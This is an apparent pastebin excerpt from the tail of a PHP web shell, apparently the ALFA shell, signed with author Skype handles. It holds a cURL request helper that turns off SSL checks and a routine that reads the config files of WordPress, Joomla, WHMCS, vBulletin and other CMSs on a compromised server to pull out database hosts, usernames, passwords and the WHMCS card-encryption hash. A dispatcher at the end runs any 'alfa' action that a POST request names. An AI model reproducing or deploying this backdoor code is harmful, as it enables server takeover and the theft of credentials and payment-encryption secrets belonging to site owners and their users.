  6164. curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
  6165. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  6166. curl_setopt($process, CURLOPT_ENCODING , $this->compression);
  6167. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  6168. if($this->ssl){
  6169. curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
  6170. curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
  6171. }
  6172. if($this->cookies){
  6173. curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
  6174. curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
  6175. }
  6176. if($this->proxy){
  6177. curl_setopt($process, CURLOPT_PROXY, $this->proxy);
  6178. }
  6179. if($method=='post'){
  6180. curl_setopt($process, CURLOPT_POSTFIELDS, $data);
  6181. curl_setopt($process, CURLOPT_POST, 1);
  6182. curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
  6183. }
  6184. $return = curl_exec($process);
  6185. curl_close($process);
  6186. return $return;
  6187. }
  6188. function error($error) {
  6189. echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
  6190. die;
  6191. }
  6192. }
  6193. function getConfigHtml($cms){
  6194. $content = '';
  6195. $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
  6196. $content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
  6197. foreach($cms_array as $key => $val){
  6198. $content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
  6199. }
  6200. $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
  6201. $content .= "</form>";
  6202. return $content;
  6203. }
  6204. function alfaGetConfig(){
  6205. $cms = $_POST['alfa1'];
  6206. $path = trim($_POST['alfa2']);
  6207. $config = array(
  6208. 'wp'=>array('file'=>'/wp-config.php',
  6209. 'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6210. 'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6211. 'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6212. 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6213. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6214. ),
  6215. 'drupal'=>array('file'=>'/config.php',
  6216. 'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6217. 'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6218. 'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6219. 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6220. 'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
  6221. ),
  6222. 'vb'=>array('file'=>'/includes/config.php',
  6223. 'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6224. 'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6225. 'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6226. 'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6227. 'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6228. ),
  6229. 'phpnuke'=>array('file'=>'/config.php',
  6230. 'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6231. 'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6232. 'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6233. 'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6234. 'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
  6235. ),
  6236. 'smf'=>array('file'=>'/Settings.php',
  6237. 'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6238. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6239. 'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6240. 'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6241. 'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6242. ),
  6243. 'whmcs'=>array('file'=>'/configuration.php',
  6244. 'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6245. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6246. 'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6247. 'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6248. 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6249. ),
  6250. 'joomla'=>array('file'=>'/configuration.php',
  6251. 'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6252. 'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6253. 'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6254. 'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6255. 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6256. ),
  6257. 'phpbb'=>array('file'=>'/config.php',
  6258. 'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6259. 'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6260. 'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6261. 'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6262. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6263. ),
  6264. 'mybb'=>array('file'=>'/inc/config.php',
  6265. 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6266. 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6267. 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6268. 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6269. 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6270. )
  6271. );
  6272. $data = array();
  6273. $srch_host = $config[$cms]['host'][0];
  6274. $srch_user = $config[$cms]['dbuser'][0];
  6275. $srch_name = $config[$cms]['dbname'][0];
  6276. $srch_pw = $config[$cms]['dbpw'][0];
  6277. $prefix = $config[$cms]['prefix'][0];
  6278. $file = $config[$cms]['file'];
  6279. $chost = $config[$cms]['host'][1];
  6280. $cuser = $config[$cms]['dbuser'][1];
  6281. $cname = $config[$cms]['dbname'][1];
  6282. $cpw = $config[$cms]['dbpw'][1];
  6283. $cprefix = $config[$cms]['prefix'][1];
  6284. if(@is_dir($path)||_alfa_is_dir($path)){
  6285. $file=$path.$file;
  6286. }elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
  6287. $file=$path;
  6288. }else{
  6289. return false;
  6290. }
  6291. $file = __read_file($file);
  6292. if(preg_match($srch_host, $file, $mach)){
  6293. $data['host'] = $mach[$chost];
  6294. }
  6295. if(preg_match($srch_user, $file, $mach)){
  6296. $data['user'] = $mach[$cuser];
  6297. }
  6298. if(preg_match($srch_name, $file, $mach)){
  6299. $data['dbname'] = $mach[$cname];
  6300. }
  6301. if(preg_match($srch_pw, $file, $mach)){
  6302. $data['password'] = $mach[$cpw];
  6303. }
  6304. if(isset($prefix)){
  6305. if(preg_match($prefix, $file, $mach)){
  6306. $data['prefix'] = $mach[$cprefix];
  6307. }
  6308. }
  6309. if($cms=='whmcs'){
  6310. if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
  6311. $data['cc_encryption_hash'] = $mach[3];
  6312. }
  6313. }
  6314. echo json_encode($data);
  6315. }
  6316. if(empty($_POST['a']))
  6317. if(isset($default_action) && function_exists('alfa' . $default_action))
  6318. $_POST['a'] = $default_action;
  6319. else
  6320. $_POST['a'] = 'FilesMan';
  6321. if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
  6322. call_user_func('alfa' . $_POST['a']);
  6323. exit;
  6324. /*
  6325. #Persian Gulf For Ever
  6326. #skype : sole.sad
  6327. #skype : ehsan.invisible
  6328. */
  6329. ?>
RAW Paste Data